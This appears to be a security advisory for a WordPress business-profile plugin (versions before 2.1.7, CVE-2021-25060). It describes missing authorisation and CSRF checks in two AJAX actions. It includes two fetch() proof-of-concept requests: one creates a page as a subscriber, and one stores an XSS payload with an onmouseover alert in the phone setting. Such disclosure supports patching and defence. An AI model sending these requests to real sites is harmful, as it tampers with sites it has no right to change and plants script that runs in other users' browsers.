Lucene search
Krzysztof ZającWPEX-ID:9E1AC711-1F65-49FA-B007-66170A77B265HistoryJan 18, 2022 - 12:00 a.m.
Five Star Business Profile and Schema < 2.1.7 - Subscriber+ Page Creation & Settings Update to Stored XSS
2022-01-1800:00:00
Krzysztof Zając
108
0.001 Low
EPSS
Percentile
24.8%
The plugin does not have any authorisation and CSRF in its bpfwp_welcome_add_contact_page and bpfwp_welcome_set_contact_information AJAX action, allowing any authenticated users, such as subscribers, to call them. Furthermore, due to the lack of sanitisation, it also lead to Stored Cross-Site Scripting issues
Page creation:
fetch("https://127.0.0.1:8001/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "bpfwp_welcome_add_contact_page", "contact_page_title": "hey there!"}),
"method": "POST",
"credentials": "include"
});
Settings upgrade:
fetch("https://127.0.0.1:8001/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "bpfwp_welcome_set_contact_information", "phone": '" style=left:0;top:0;right:0;bottom:0;position:fixed onmouseover=alert(1) x='}),
"method": "POST",
"credentials": "include"
});
Related
prion
prion
Cross site scripting
2022-02-21 11:15:00
cvelist
cvelist
patchstack
patchstack
nvd
nvd
CVE-2021-25060
2022-02-21 11:15:08
wpvulndb
wpvulndb
cve
cve
CVE-2021-25060
2022-02-21 11:15:08